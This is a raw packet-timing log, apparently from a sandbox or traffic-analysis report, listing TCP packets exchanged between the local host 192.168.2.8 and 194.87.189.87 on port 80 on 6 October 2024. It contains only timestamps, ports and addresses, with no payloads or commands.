                                                                                                                                    Oct 6, 2024 21:28:16.580733061 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.580743074 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.580750942 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.580765009 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.580777884 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.580782890 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.580810070 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.580831051 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.580897093 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.580913067 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.580920935 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.580933094 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.580956936 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.580960035 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.580991030 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581007004 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581034899 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581043959 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581065893 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581068993 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581103086 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581129074 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581170082 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581192970 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581208944 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581217051 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581228971 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581255913 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581289053 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581317902 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581321955 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581326962 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581370115 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581389904 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581434011 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581573009 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581600904 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581609011 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581645012 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581686974 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581696987 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581722975 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581726074 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581742048 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581742048 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581775904 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581798077 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581831932 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581840992 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581850052 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581887007 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581919909 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581947088 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.581954002 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581983089 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.581994057 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582010984 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582026958 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582052946 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582056046 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582078934 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582088947 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582117081 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582124949 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582139969 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582149029 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582158089 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582184076 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582199097 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582214117 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582238913 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582241058 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582263947 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582283974 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582292080 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582302094 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582329988 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582345009 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582370043 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582434893 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582443953 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582470894 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582487106 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582492113 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582523108 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582531929 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582531929 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582565069 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582576036 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582612991 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582648039 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582686901 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582707882 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582716942 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582725048 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582741022 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582766056 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582803011 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582813025 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582845926 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582925081 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582958937 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.582961082 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.582971096 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583003998 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.583022118 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583048105 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583066940 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.583091021 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.583092928 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583134890 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.583184958 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583194017 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583229065 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.583281040 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583291054 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583304882 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583312988 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583317995 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.583359003 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.583431005 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583466053 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.583539009 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583580971 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.583586931 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583607912 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583626032 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.583645105 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.583683014 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583690882 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583700895 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583719969 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.583734035 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583755016 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.583774090 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.583796978 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583805084 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583816051 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583823919 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583838940 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.583868027 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.583919048 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.583956957 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.619584084 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.620740891 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.620822906 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.620872021 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.620924950 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.620970011 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621017933 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621068001 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621120930 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621166945 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621225119 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621278048 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621336937 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621396065 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621448994 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621515036 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621567011 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621624947 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621685028 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621733904 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621803045 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621851921 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621905088 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.621922970 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.625751972 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.625842094 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.667587042 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.669003963 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669091940 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669151068 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669203997 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669243097 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669295073 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669336081 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669389009 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669437885 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669493914 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669547081 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669599056 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669645071 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669701099 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669751883 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669817924 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669868946 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669935942 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.669984102 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.670042038 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.670100927 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.670164108 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.670178890 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.715531111 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.715770960 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.719196081 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.720995903 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.721029997 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.721084118 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.721131086 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.721308947 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.721472025 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.721532106 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.721581936 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.721651077 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.721682072 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.771766901 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.771847963 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.782949924 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.783147097 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.783237934 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.783317089 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.783396006 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.783459902 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.835536003 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.835591078 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.869379997 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.869529009 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.869609118 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.869661093 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.869714975 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.869751930 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.874815941 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.874954939 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.875027895 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.875080109 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.875157118 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.875185966 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.919513941 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.919621944 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923001051 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.923218012 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.923331976 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923413038 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923475981 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923538923 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923593998 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923655033 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923702002 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923748970 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923804998 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923868895 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.923918009 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.928421974 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.928740025 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.928821087 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.928859949 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.975528955 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.981158018 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.990704060 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.990786076 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.990886927 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991247892 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991302013 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991348982 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991415024 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991477966 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991542101 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991592884 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991652012 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991700888 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991754055 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.991770029 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996084929 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:16.996215105 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996310949 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996365070 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996411085 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996464968 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996514082 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996581078 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996633053 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:16.996690035 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.043617010 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:17.043682098 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.076380968 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:17.076469898 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:17.076595068 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.076729059 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.076806068 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.076824903 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:17.076894999 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.076962948 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.077043056 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.077111006 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.077203989 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.077246904 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.081856012 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:17.124607086 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:17.954674006 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:17.955636024 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:17.955718040 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.955732107 CEST4974880192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:17.961731911 CEST8049748194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:55.177259922 CEST4974980192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:55.183478117 CEST8049749194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:28:55.183593035 CEST4974980192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:55.183792114 CEST4974980192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:55.183851957 CEST4974980192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:28:55.189804077 CEST8049749194.87.189.87192.168.2.8
